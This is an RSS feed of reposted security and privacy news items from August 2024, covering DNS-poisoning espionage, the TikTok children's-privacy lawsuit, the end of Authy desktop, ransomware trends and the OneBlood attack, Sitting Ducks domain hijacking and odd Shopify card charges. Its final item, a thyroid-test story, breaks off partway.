<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/39/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>China-based Evasive Panda hackers compromised an ISP to spread malware, report says</title><link>https://nsaneforums.com/news/security-privacy-news/china-based-evasive-panda-hackers-compromised-an-isp-to-spread-malware-report-says-r24631/</link><description><![CDATA[<p>
	 A China-based cyber-espionage group compromised an internet service provider (ISP) to spread malware in 2023, researchers said Friday, confirming a hunch expressed in an earlier report about the same operation.
</p>

<p>
	 
</p>

<p>
	Analysts at Volexity said the hacking operation — known as Evasive Panda, Bronze Highland, Daggerfly and StormBamboo — was indeed undertaking “adversary in the middle” attacks in 2023 as it infected Mac and Windows systems. In such incidents, threat actors get between a device and an otherwise trusted server to deliver malicious code.
</p>

<p>
	 
</p>

<p>
	Researchers at a different company, ESET, had attributed at least one malware infection to Evasive Panda in 2023 but could only speculate that it was an adversary-in-the-middle attack.
</p>

<p>
	 
</p>

<p>
	Volexity said its analysis showed that Evasive Panda had compromised the target’s ISP and was poisoning DNS requests — the basic communications that help devices reach internet addresses.
</p>

<p>
	 
</p>

<p>
	“Volexity notified and worked with the ISP, who investigated various key devices providing traffic-routing services on their network,” Volexity said. “As the ISP rebooted and took various components of the network offline, the DNS poisoning immediately stopped.”
</p>

<p>
	 
</p>

<p>
	The attackers had used the disruption to serve up information-stealing malware known as MgBot or Pocostick (for Windows machines) and Macma (for macOS devices). MgBot, in particular, has been a tool for Evasive Panda for more than a decade. ESET found MgBot used against China’s Tibetan population earlier this year.
</p>

<p>
	 
</p>

<p>
	Volexity said that in the 2023 incidents it analyzed, certain apps would request updates but the users’ devices would get MgBot and Macma instead.
</p>

<p>
	 
</p>

<p>
	“StormBamboo appeared to target software that used insecure update mechanisms, such as HTTP, and did not properly validate digital signatures of installers,” Volexity said.
</p>

<p>
	 
</p>

<p>
	Evasive Panda remains “a highly skilled and aggressive threat actor,” the researchers said, with a wide variety of malware at hand and “significant effort” invested in operations.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://therecord.media/china-based-hackers-evasive-isps-malware" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24631</guid><pubDate>Fri, 02 Aug 2024 19:40:34 +0000</pubDate></item><item><title>US sues TikTok over 'massive-scale' privacy violations of kids under 13</title><link>https://nsaneforums.com/news/security-privacy-news/us-sues-tiktok-over-massive-scale-privacy-violations-of-kids-under-13-r24629/</link><description><![CDATA[<p>
	The U.S. Justice Department filed a lawsuit Friday against TikTok and parent company ByteDance for failing to protect children's privacy on the social media app as the Biden administration continues its crackdown on the social media site.
</p>

<p>
	 
</p>

<p>
	The government said TikTok violated the Children's Online Privacy Protection Act that requires services aimed at children to obtain parental consent to collect personal information from users under age 13.
</p>

<p>
	<br />
	The Chinese-owned short-video platform boasts around 170 million U.S. users, and is currently fighting a new law that would force ByteDance to divest TikTok's U.S. assets by Jan. 19 or face a ban.
</p>

<p>
	<br />
	The lawsuit is the latest U.S. action against TikTok and its Chinese parent over fears the company improperly collects vast amounts of data on Americans for the Chinese government, while influencing content in a way that could harm Americans.
</p>

<p>
	<br />
	The suit, which was joined by the Federal Trade Commission, said it was aimed at putting an end "to TikTok's unlawful massive-scale invasions of children's privacy."
</p>

<p>
	<br />
	Representative Frank Pallone, the top Democrat on the Energy and Commerce Committee, said the suit "underscores the importance of divesting TikTok from Chinese Communist Party control. We simply cannot continue to allow our adversaries to harvest vast troves of Americans’ sensitive data."
</p>

<p>
	<br />
	TikTok said Friday it disagrees "with these allegations, many of which relate to past events and practices that are factually inaccurate or have been addressed. We are proud of our efforts to protect children, and we will continue to update and improve the platform."
</p>

<p>
	<br />
	The DOJ said TikTok knowingly permitted children to create regular TikTok accounts, and then create and share short-form videos and messages with adults and others on the regular TikTok platform. TikTok collected personal information from these children without obtaining consent from their parents.
</p>

<p>
	<br />
	The U.S. alleges that for years millions of American children under 13 have been using TikTok and the site "has been collecting and retaining children's personal information."
</p>

<p>
	<br />
	"TikTok knowingly and repeatedly violated kids’ privacy, threatening the safety of millions of children across the country,” said FTC Chair Lina Khan, whose agency in June referred the case to the Justice Department.
</p>

<p>
	<br />
	The FTC is seeking penalties of up to $51,744 per violation per day from TikTok for improperly collecting data, which could theoretically total billions of dollars if TikTok were found liable.
</p>

<p>
	<br />
	Reuters in 2020 first reported the FTC and Justice Department were looking into allegations the popular social media app failed to live up to a 2019 agreement aimed at protecting children's privacy.
</p>

<p>
	<br />
	The company last year faced fines from the European Union and U.K. over its handling of children's data.
</p>

<p>
	<br />
	On Tuesday, the U.S. Senate passed a bill that would extend COPPA to cover teenagers up to age 17, ban targeted advertising to kids and teens, and give parents and kids the option to delete their information from social media platforms.
</p>

<p>
	<br />
	The bill would need to pass in the Republican-controlled House, currently on recess until September, to become law.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.reuters.com/technology/doj-faces-friday-deadline-tiktok-children-privacy-suit-2024-08-02/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24629</guid><pubDate>Fri, 02 Aug 2024 19:14:40 +0000</pubDate></item><item><title>Twilio kills off Authy for desktop, forcibly logs out all users</title><link>https://nsaneforums.com/news/security-privacy-news/twilio-kills-off-authy-for-desktop-forcibly-logs-out-all-users-r24614/</link><description><![CDATA[<p>
	Twilio has finally killed off its Authy for Desktop application, forcibly logging users out of the desktop application.
</p>

<p>
	 
</p>

<p>
	In January, <a href="https://www.bleepingcomputer.com/news/security/twilio-will-ditch-its-authy-desktop-2fa-app-in-august-goes-mobile-only/" rel="external nofollow" target="_blank">Twilio announced</a> that the Authy desktop apps for Windows, macOS, and Linux would reach end of life on March 19, 2024, and would ultimately be discontinued in August 2024.
</p>

<p>
	 
</p>

<p>
	While the desktop apps continued to work past March, when opened, they showed an alert warning that the program had reached end of life and that users should switch to the mobile versions immediately.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Authy for desktop warnings" class="ipsImage" height="350" width="357" src="https://www.bleepstatic.com/images/news/security/a/authy/rip-desktop/authy-alert.jpg">
		<figcaption>
			<em>Authy for desktop warnings<br>
			Source: BleepingComputer</em>
		</figcaption>
	</figure>
</div>

<p>
	This ended about thirteen days ago when Twilio forcibly logged all desktop devices out of their Authy accounts and no longer allowed them to log back in with their phone numbers.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Authy for desktop users forcibly logged out" class="ipsImage" height="720" width="433" src="https://www.bleepstatic.com/images/news/security/a/authy/rip-desktop/device-removed.jpg">
		<figcaption>
			<em>Authy for desktop users forcibly logged out<br>
			Source: BleepingComputer</em>
		</figcaption>
	</figure>
</div>

<p>
	Those who have continued to use Authy for Desktop, even after all the warnings, have found that their 2FA accounts are gone unless they had previously synced them with a mobile device.
</p>

<p>
	 
</p>

<p>
	However, those who synced their desktop apps with the mobile versions have discovered that some of their <a href="https://www.reddit.com/r/Authy/comments/1e9u5so/tokens_are_gone/" rel="external nofollow" target="_blank">tokens did not correctly synchronize</a>, making their associated accounts inaccessible.
</p>

<p>
	 
</p>

<p>
	In June, threat actors found an unsecured Authy API that could be used to verify if a phone number was associated with a valid account.
</p>

<p>
	 
</p>

<p>
	The threat actors fed millions of phone numbers into the API, allowing them to build profiles of <a href="https://www.bleepingcomputer.com/news/security/hackers-abused-api-to-verify-millions-of-authy-mfa-phone-numbers/" target="_blank" rel="external nofollow">33 million phone numbers on Authy</a>, which were then leaked on a hacking forum.
</p>

<p>
	 
</p>

<p>
	Twilio fixed the bug by securing the API and releasing an updated mobile app version. Some believe that Authy desktop users cannot log in because the desktop app has not been updated with the new fix for the API.
</p>

<p>
	 
</p>

<p>
	However, in June, Authy released version 3.0, stating it would be the final desktop release, so it is unlikely we will see another one.
</p>

<p>
	 
</p>

<p>
	<em>Update 8/1/24: </em>Twilio told BleepingComputer that users were logged out as part of the planned end of life for the Authy desktop apps, as described <a href="https://help.twilio.com/articles/22771146070299-User-guide-End-of-Life-EOL-for-Twilio-Authy-Desktop-app" rel="external nofollow" target="_blank">here</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/twilio-kills-off-authy-for-desktop-forcibly-logs-out-all-users/" rel="external nofollow">Source</a>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Thank you for appreciating my time and effort posting news every single day for many years.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>2023: Over 5,800 news posts | 2024 (till end of July): 3,313 news posts</em></span>
</p>
]]></description><guid isPermaLink="false">24614</guid><pubDate>Fri, 02 Aug 2024 04:10:40 +0000</pubDate></item><item><title>More Legal Records Stolen in 2023 Than Previous 5 Years Combined</title><link>https://nsaneforums.com/news/security-privacy-news/more-legal-records-stolen-in-2023-than-previous-5-years-combined-r24611/</link><description><![CDATA[<p>
	<span style="font-size:16px;">Law firms make the perfect target for extortion, so it's no wonder that ransomware attackers target them and demand multimillion dollar ransoms.</span>
</p>

<p>
	 
</p>

<p>
	2023 was the worst year on record for cybersecurity in the legal industry by some distance.
</p>

<p>
	 
</p>

<p>
	Just one point of evidence: Since 2018, 2.9 million records have been stolen in association with publicly reported breaches of law firms.
</p>

<p>
	 
</p>

<p>
	Some 1.56 million records were stolen last year alone, an increase of 615% as compared with the down year of 2022 (218,473 records).
</p>

<p>
	 
</p>

<p>
	A new blog post from Comparitech paints a picture of an industry struggling to grapple with the ransomware problem. Major law firms have been paying multimillion dollar sums to protect their clients' ultra-sensitive data, and flailing in their attempts to fight back.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>The State of Legal Industry Cybersecurity</strong></span>
</p>

<p>
	 
</p>

<p>
	Since 2018, 138 legal firms have publicly admitted being affected by ransomware attacks.
</p>

<p>
	 
</p>

<p>
	Of those, 107 attacks have been US-based, with approximately 2.9 million records affected. As Comparitech noted, the distance between the US and its next neighbors — the UK, with 9 attacks affecting 9,703 records, and Germany, with 5 affecting an unknown number — may have more to do with reporting requirements than anything else.
</p>

<p>
	 
</p>

<p>
	The average ransom among publicly reported cases has been $2.47 million, and the average amount actually paid out after negotiations is $1.65 million. These numbers are rough estimates of reality, however, as only 11 reported incidents also reported the ransom demands, with only eight reported ransoms paid.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>Consequences to Law Firms</strong></span>
</p>

<p>
	 
</p>

<p>
	If ransomware attacks against law firms have been trending, it's because they make for perfect targets.
</p>

<p>
	 
</p>

<p>
	"Legal firms are an interesting case," Paul Bischoff, privacy advocate at Comparitech explains, "because with most any other company, hackers are just looking for low-hanging fruit. They may want as many, say, Social Security numbers or passwords as they can possibly steal. And higher quantities of records is the goal. But with law firms, you have data that's very valuable to very specific people.
</p>

<p>
	 
</p>

<p>
	Documents related to ongoing litigation would be extremely valuable to an opposing party in that case. So it's not so much about the quantity of data as much as it is about the content."
</p>

<p>
	 
</p>

<p>
	The ultra-sensitivity of legal data puts firms in a difficult negotiating position: pay millions of dollars, and risk achieving nothing, or don't, and risk extra ire from clients. 12% of legal industry ransomware attacks have resulted in lawsuits, and at least 75% of those have been successful.
</p>

<p>
	 
</p>

<p>
	Another reason to pay up? Comparitech estimates that the 138 attacks recorded might have cost victims around $18.8 billion, purely thanks to the downtime they incurred. One victim of LockBit — the Ince Group, based in London — filed for bankruptcy last year after failing to cover the £5 million ($6.5 million USD) it spent restoring its systems.
</p>

<p>
	 
</p>

<p>
	Meanwhile, when victims try to use the law in their aid, they usually fail. The UK's Ward Hadaway and Australia's HWL Ebsworth Lawyers both issued injunctions against their attackers to little effect, as anonymous hackers aren't particularly easy to wrangle into court.
</p>

<p>
	 
</p>

<p>
	Canadian firm Robson Carpenter LLP enjoyed seeing its attacker face justice, but in the end received just $2,500 in restitution.
</p>

<p>
	 
</p>

<p>
	On the bright side, ransomware attacks against law firms in 2024 are noticeably lagging behind last year's numbers. Only 11 have been reported so far, affecting an unknown volume of client data.
</p>

<p>
	 
</p>

<p>
	"Overall, ransomware attacks happen down in frequency of attacks across all sectors that we've been covering," Bischoff notes. Perhaps, he speculates, attackers have been choosing quality over quantity. Or, more optimistically, "I think it's law enforcement crackdowns, and companies and organizations getting better in general at knowing what these threats are and being prepared."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.darkreading.com/threat-intelligence/more-legal-records-stolen-2023-than-prior-5-years-combined" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24611</guid><pubDate>Thu, 01 Aug 2024 22:03:30 +0000</pubDate></item><item><title>Over 1 Million Domains at Risk of 'Sitting Ducks' Domain Hijacking Technique</title><link>https://nsaneforums.com/news/security-privacy-news/over-1-million-domains-at-risk-of-sitting-ducks-domain-hijacking-technique-r24596/</link><description><![CDATA[<p>
	Over a million domains are susceptible to takeover by malicious actors by means of what has been called a Sitting Ducks attack.
</p>

<p>
	 
</p>

<p>
	The powerful attack vector, which exploits weaknesses in the domain name system (DNS), is being exploited by over a dozen Russian-nexus cybercriminal actors to stealthily hijack domains, a joint analysis published by Infoblox and Eclypsium has revealed.
</p>

<p>
	 
</p>

<p>
	"In a Sitting Ducks attack, the actor hijacks a currently registered domain at an authoritative DNS service or web hosting provider without accessing the true owner's account at either the DNS provider or registrar," the researchers said.
</p>

<p>
	 
</p>

<p>
	"Sitting Ducks is easier to perform, more likely to succeed, and harder to detect than other well-publicized domain hijacking attack vectors, such as dangling CNAMEs."
</p>

<p>
	 
</p>

<p>
	Once a domain has been taken over by the threat actor, it could be used for all kinds of nefarious activities, including serving malware and sending spam, while abusing the trust associated with the legitimate owner.
</p>

<p>
	 
</p>

<p>
	Details of the "pernicious" attack technique were first documented by The Hacker Blog in 2016, although it remains largely unknown and unresolved to date. More than 35,000 domains are estimated to have been hijacked since 2018.
</p>

<p>
	 
</p>

<p>
	"It is a mystery to us," Dr. Renee Burton, vice president of threat intelligence at Infoblox, told The Hacker News. "We frequently receive questions from prospective clients, for example, about dangling CNAME attacks which are also a hijack of forgotten records, but we have never received a question about a Sitting Ducks hijack."
</p>

<p>
	 
</p>

<p>
	At issue is the incorrect configuration at the domain registrar and the authoritative DNS provider, coupled with the fact that the nameserver is unable to respond authoritatively for a domain it's listed to serve (i.e., lame delegation).
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="spot-image-sitting-duck-fig-2.jpg" class="ipsImage" data-ratio="75.10" height="540" width="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqmoIJSOmp9mx2Igt8-uX9deJmmTsdekpKzUI60TPfHMBPcLLOriWxAoSrjHznaI3tWHMLqZa6oYvf7WNxWUTz_uzW55TRlhu_eE2Nty7dZ0HD_j0Ytr7C6nsblF5_9dWWN7UbpGiwb3VKJ0WHbjpnnMSmfMVZthAcZRKWo5Ze-R3RGIhIcMgC_JzLF7QZ/s1700/spot-image-sitting-duck-fig-2.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	It also requires that the authoritative DNS provider is exploitable, permitting the attacker to claim ownership of the domain at the delegated authoritative DNS provider while not having access to the valid owner's account at the domain registrar.
</p>

<p>
	 
</p>

<p>
	In such a scenario, should the authoritative DNS service for the domain expire, the threat actor could create an account with the provider and claim ownership of the domain, ultimately impersonating the brand behind the domain to distribute malware.
</p>

<p>
	 
</p>

<p>
	"There are many variations [of Sitting Ducks], including when a domain has been registered, delegated, but not configured at the provider," Burton said.
</p>

<p>
	 
</p>

<p>
	The Sitting Ducks attack has been weaponized by different threat actors, with the stolen domains used to fuel multiple traffic distribution systems (TDSes) such as 404 TDS (aka Vacant Viper) and VexTrio Viper. It has also been leveraged to propagate bomb threat hoaxes and sextortion scams.
</p>

<p>
	 
</p>

<p>
	"Organizations should check the domains they own to see if any are lame and they should use DNS providers that have protection against Sitting Ducks," Burton said.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2024/08/over-1-million-domains-at-risk-of.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24596</guid><pubDate>Thu, 01 Aug 2024 18:21:38 +0000</pubDate></item><item><title>Ever More Toxic Ransomware Brands Breed Lone Wolf Operators</title><link>https://nsaneforums.com/news/security-privacy-news/ever-more-toxic-ransomware-brands-breed-lone-wolf-operators-r24594/</link><description><![CDATA[<p>
	<span style="font-size:16px;">Ransomware Responders See a Surge, Likely Comprising Groups' Displaced Affiliates</span>
</p>

<p>
	 
</p>

<p>
	The downfall of previously high-flying ransomware operations Alphv and LockBit has shaken up the criminal underground, turning some former affiliates into lone operators and causing some under-the-radar groups to rack up record extortion payments.
</p>

<p>
	 
</p>

<p>
	Ransomware incident response firm Coveware said in a report that 10% of all ransomware attacks it monitored from April through June came from lone operators - a massive surge.
</p>

<p>
	 
</p>

<p>
	Those hackers likely are former affiliates of Alphv - aka BlackCat - or LockBit, "or actors that made the decision to operate independently due to the increasing threat of exposure, interruption and profit loss associated with 'toxic' ransomware brands," Coveware said.
</p>

<p>
	 
</p>

<p>
	Not every former affiliate of a disrupted ransomware gang is choosing to go it alone. One victim earlier this year paid the highest publicly known ransom in history, worth $75 million, to the Dark Angels ransomware group, said Zscaler ThreatLabz. Dark Angels has operated since May 2022 and runs the Dunghill data leak site, but it "has managed to attract very minimal attention."
</p>

<p>
	 
</p>

<p>
	Blockchain analytics firm Chainalysis said it saw the record-setting payment. Big game hunting, or "fewer attacks on larger targets with deeper pockets," lately continues to grow "more pronounced," it said in a post to social platform X.
</p>

<p>
	 
</p>

<p>
	Who paid the recent $75 million ransom? Zscaler declined to name names, saying only that the firm is on the Fortune 50 list of the most profitable publicly traded U.S. companies. As Bleeping Computer reported, this could line up with a ransomware attack against Fortune 10 pharmaceutical giant Cencora in February, which disclosed the attack but offered no specifics.
</p>

<p>
	 
</p>

<p>
	No ransomware group ever claimed credit for the hit. When this happens, it often means a victim did pay a ransom, which forestalled the attackers from trying to name and shame them or leak stolen data.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>Rampant Innovation</strong></span>
</p>

<p>
	 
</p>

<p>
	Never-ending innovation by top-flight ransomware attackers highlights their profit-making imperative at the expense of all else, as repeat hits on hospitals, blood banks, schools and critical infrastructure demonstrate.
</p>

<p>
	 
</p>

<p>
	Much innovation arrived in recent years alongside the rise of ransomware-as-a-service groups. These paired operators who built crypto-locking malware, ran data leak infrastructure and sometimes handled negotiations with affiliates who used the malware to take down targets, typically keeping 70% or 80% of every resulting ransom in return.
</p>

<p>
	 
</p>

<p>
	Even with these RaaS groups, experts said credit for most attacks also goes to the affiliates involved. After BlackCat disappeared in March, one of its Western affiliates accused the Russian operators of purposefully shutting down, rather than sharing his cut of a $22 million ransom paid by UnitedHealth Group after he hit its Change Healthcare unit.
</p>

<p>
	 
</p>

<p>
	Even without such dramatic backstabbing, affiliates regularly switch allegiance, sometimes in return for a bigger commission or to access technical innovations. Some also work with multiple groups at once, deciding on a per-victim basis which type of ransomware might be the best fit, perhaps based on the crypto-locking malware's capabilities, if it is a supply chain attack, or on the basis of a group's data leak infrastructure, negotiation capabilities or even the scariness of its reputation (see: Ransomware Groups' Data Leak Blogs Lie: Stop Trusting Them).
</p>

<p>
	 
</p>

<p>
	Just as affiliates come and go, the groups themselves may have opaque relationships with each other. When Dark Angels debuted, it used a variant of Babuk ransomware, reported Cyble. The group then switched to Ragnar Locker, at least until police seized that group's infrastructure last October, ThreatLabz said.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>Imperative: Make Victims Pay</strong></span>
</p>

<p>
	 
</p>

<p>
	The impetus for ransomware threat actors' unceasing innovation is to counteract the constant improvement in organizations' collective defenses and force more victims to pay.
</p>

<p>
	 
</p>

<p>
	Lately, the bad guys appear to have gained an edge. Coveware said 36% of victims chose to pay a ransom during the second quarter of this year, up from 28% in the first three months. They paid on average $391,015 - a 2.4% increase from the prior quarter. In the same time frame, the median ransom payment dropped by one-third, to $170,000. This could reflect a relatively higher number of lower-price ransom payments than before and/or a few very high payments.
</p>

<p>
	 
</p>

<p>
	Of the companies who paid, 43% did so solely in response to data exfiltration, in return for a promise from criminals to delete their stolen data. This was a sharp increase from the 23% who paid only for data deletion from January through March (see: Ransom Realpolitik: Paying for Data Deletion Is for Suckers).
</p>

<p>
	 
</p>

<p>
	Coveware said the greatest number of attacks it saw involved Akira ransomware, followed by independent operators. Next up in terms of market share were Black Basta, BlackSuit, LockBit 3.0, Medusa, BianLian, Inc Ransom and Phobos.
</p>

<p>
	 
</p>

<p>
	Both Akira and Black Basta's market shares held steady in the first half of this year, and the tactics, techniques and procedures used to distribute their ransomware didn't appear to change, "suggesting not all ransomware brands have opened their doors to receive displaced affiliates," Coveware said. At the same time, TTPs previously tied to just BlackCat or LockBit attacks suddenly became tied to other groups' or independent operators' attacks.
</p>

<p>
	 
</p>

<p>
	As that highlights, simply tracking which ransomware groups appear to be hot or not doesn't tell the full story - and especially now with more lone wolves in play.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.inforisktoday.com/blogs/ever-more-toxic-ransomware-brands-breed-lone-wolf-operators-p-3682" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24594</guid><pubDate>Thu, 01 Aug 2024 17:42:21 +0000</pubDate></item><item><title>Credit card users get mysterious shopify-charge.com charges</title><link>https://nsaneforums.com/news/security-privacy-news/credit-card-users-get-mysterious-shopify-chargecom-charges-r24588/</link><description><![CDATA[<p>
	People worldwide report seeing mysterious $1 or $0 charges from Shopify-charge.com appearing on their credit card bills, even when they did not attempt to purchase anything.
</p>

<p>
	 
</p>

<p>
	The charges have no rhyme or reason to them and are seen on physical and virtual credit cards of all types, including those from Discover, Monzo, Capital One, and other Visa cards. Some people report that charges were also attempted against older deactivated cards.
</p>

<p>
	 
</p>

<p>
	According to reports, the charges started approximately ten days ago, on July 21st, with the number of impacted people increasing as time passed.
</p>

<p>
	 
</p>

<p>
	"Not sure if it was just me today but seems like I've got a shopify active card check today. Thankfully, no money was debited. Got in touch with support and they confirmed it was a scammer," warned a Monzo card member <a href="https://www.reddit.com/r/monzo/comments/1e8tkqo/suspected_fraud/" rel="external nofollow" target="_blank">on Reddit</a>.
</p>

<p>
	 
</p>

<p>
	"I just received an email from privacy.com notifying me of a decline. The declined payment was for $0.00 charge at SHOPIFY-CHARGE.COM I have not used this card outside of paying for my Wyze cam subscription," <a href="https://www.reddit.com/r/wyzecam/comments/1eec1i7/compromised_credit_card_payments/" rel="external nofollow" target="_blank">warned another person</a>.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Example $0 charge from shopify-charge.com" class="ipsImage" height="720" width="359" src="https://www.bleepstatic.com/images/news/security/s/shopify/shopify-charges.com-charge/shopify-charge.jpg">
		<figcaption>
			<em>Example $0 charge from shopify-charge.com<br>
			Source: Reddit</em>
		</figcaption>
	</figure>
</div>

<p>
	Since then, many people have reported these unusual charges on Reddit and the <a href="https://community.shopify.com/c/shopify-discussions/a-charge-for-0-00-from-shopify-charge-com/m-p/2678947" rel="external nofollow" target="_blank">Shopify forums</a>.
</p>

<p>
	 
</p>

<p>
	Of more concern is that two people claimed to have received similar charges soon after creating a new virtual card at their bank.
</p>

<p>
	 
</p>

<p>
	The attempted charges state they are from shopify-charge.com with a phone number of 866-938-2427. Some attempted charges <a href="https://www.reddit.com/r/shopify/comments/1e9w9it/pending_1_shopifychargecom_on_my_credit_card/" rel="external nofollow" target="_blank">include an address</a> of 5715 Will Clayton Pkwy, Texas 77338, which appears to be a non-existent location.
</p>

<p>
	 
</p>

<p>
	However, Shopify-charge.com is a legitimate website operated by Shopify that, when visited in a browser, explains to a user that the charge came from a subscription fee or a purchase at a Shopify store. While some who received these charges claim they have never used their credit card at Shopify, many stores use the platform as their backend without a customer knowing.
</p>

<p>
	 
</p>

<p>
	As for the phone number, BleepingComputer's attempts to call it led to the debt collection firm Halsted Financial. BleepingComputer emailed the company to see if they were associated with the charges but has not received a reply yet.
</p>

<p>
	 
</p>

<p>
	One impacted person <a href="https://www.reddit.com/r/personalfinance/comments/1e8pcnv/comment/lfi9cgc/" rel="external nofollow" target="_blank">posted to Reddit</a> saying they called the number, and Halsted said they do not know why their number is associated with these charges.
</p>

<p>
	 
</p>

<p>
	Shopify has recently <a href="https://www.bleepingcomputer.com/news/security/shopify-denies-it-was-hacked-links-stolen-data-to-third-party-app/" target="_blank" rel="external nofollow">suffered a third-party data breach</a> at one of its vendors, leading many to think these charges may be related. However, the data exposed in that breach did not contain credit card or payment information.
</p>

<p>
	 
</p>

<p>
	BleepingComputer attempted to contact Shopify multiple times but did not receive a reply to our emails.
</p>

<p>
	 
</p>

<p>
	If you have received any of these charges and have more information to share, please comment on this story, contact us via Signal at 646-961-3731, or email us tips@bleepingcomputer.com.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/credit-card-users-get-mysterious-shopify-chargecom-charges/" rel="external nofollow">Source</a>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Thank you for appreciating my time and effort posting news every single day for many years.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>2023: Over 5,800 news posts | 2024 (till end of July): 3,313 news posts</em></span>
</p>
]]></description><guid isPermaLink="false">24588</guid><pubDate>Thu, 01 Aug 2024 06:36:52 +0000</pubDate></item><item><title>Ransomware attack on major US blood center prompts hundreds of hospitals to implement shortage protocols</title><link>https://nsaneforums.com/news/security-privacy-news/ransomware-attack-on-major-us-blood-center-prompts-hundreds-of-hospitals-to-implement-shortage-protocols-r24585/</link><description><![CDATA[<p>
	One of the largest blood centers in the U.S. is operating at reduced capacity after ransomware hackers shut down parts of its system.
</p>

<p>
	 
</p>

<p>
	Nonprofit OneBlood, which provides blood to healthcare facilities across the southeast, released a statement on Wednesday warning the public that the ransomware attack is impacting their ability to operate.
</p>

<p>
	 
</p>

<p>
	“We have implemented manual processes and procedures to remain operational. Manual processes take significantly longer to perform and impact inventory availability,” said Susan Forbes, OneBlood senior vice president of corporate communications.
</p>

<p>
	 
</p>

<p>
	“In an effort to further manage the blood supply we have asked the more than 250 hospitals we serve to activate their critical blood shortage protocols and to remain in that status for the time being.”
</p>

<p>
	 
</p>

<p>
	OneBlood said it is now working with cybersecurity specialists alongside federal and state officials to resolve the crisis. The organization provides blood and other healthcare material to hundreds of hospitals across Alabama, South Carolina, Florida, Georgia and North Carolina.
</p>

<p>
	 
</p>

<p>
	The organization is still operational and has continued to collect, test and distribute blood but is “operating at a significantly reduced capacity.”
</p>

<p>
	 
</p>

<p>
	The incident has prompted an outpouring of support from other blood organizations and the AABB Disaster Task Force is now organizing efforts to send blood and platelets to OneBlood. There is an urgent need for O positive, O negative and platelet donations, but all blood types are needed.
</p>

<p>
	 
</p>

<p>
	Forbes said the company immediately began an investigation to confirm the attack before kicking off efforts to address the incident.
</p>

<p>
	“Our comprehensive response efforts are ongoing and we are working diligently to restore full functionality to our systems as expeditiously as possible,” Forbes explained.
</p>

<p>
	 
</p>

<p>
	“The blood supply cannot be taken for granted. The situation we are dealing with is ongoing. If you are eligible to donate, we urge you to please make an appointment to donate as soon as possible.”
</p>

<p>
	 
</p>

<p>
	The attack was first reported by CNN, which obtained an advisory sent to the Health Information Sharing and Analysis Center that warned of potential shortages at hospitals in Florida. The organization has had to manually label blood products due to the ransomware attack, CNN reported.
</p>

<p>
	 
</p>

<p>
	The attack comes just one week after a prominent U.K. blood test provider said it has made significant progress in rebuilding substantial parts of its IT infrastructure following a ransomware attack in June.
</p>

<p>
	 
</p>

<p>
	Pathology services provider Synnovis was attacked by the Qilin ransomware gang last month, causing the cancellation of more than 1,000 critical surgeries and forcing England’s National Health Service to issue urgent calls for O-type blood donations.
</p>

<p>
	 
</p>

<p>
	The ransomware attack left U.K. national blood stocks “in a very fragile position,” according to a letter sent two weeks ago to National Health Service chief executives.
</p>

<p>
	 
</p>

<p>
	Ransomware gangs also attacked the national lab service of South Africa, gravely impacting the country’s efforts to deal with several concurrent health crises — mpox, HIV and tuberculosis.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://therecord.media/ransomware-attack-blood-center-shortage-protocols-hospitals" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24585</guid><pubDate>Thu, 01 Aug 2024 01:01:22 +0000</pubDate></item><item><title>Taiwan pioneers non-invasive urine test for thyroid cancer</title><link>https://nsaneforums.com/news/security-privacy-news/taiwan-pioneers-non-invasive-urine-test-for-thyroid-cancer-r24584/</link><description><![CDATA[<p>
	Taipei, July 31 (CNA) A novel non-invasive method for postoperative monitoring of thyroid cancer using a protein biomarker in urine has the potential to cut detection costs, according to researchers in Taiwan.
</p>

<p>
	 
</p>

<p>
	Thyroid cancer is the ninth most common cancer among Taiwanese people, according to Wang Chih-yuan (王治元), deputy director at the Department of Internal Medicine at National Taiwan University Hospital and leader of the research team that conducted the groundbreaking study.
</p>

<p>
	 
</p>

<p>
	"Thyroid cancer has the longest survival rate among thyroid-related cancers, making long-term monitoring an important issue," Wang said at a press conference on Wednesday.
</p>

<p>
	 
</p>

<p>
	A total thyroidectomy (surgical removal of all the thyroid gland) and radioactive iodine therapy are the two most common treatments for thyroid cancer, explained Wang, adding that the detection of serum thyroglobulin, a protein found in human blood, is the traditional way to monitor patients for residual tumor cells or recurrent cancer.
</p>

<p>
	 
</p>

<p>
	However, such a detection method is invasive since it requires drawing blood from patients, and can also be affected by anti-thyroglobulin antibodies, Wang noted.
</p>

<p>
	 
</p>

<p>
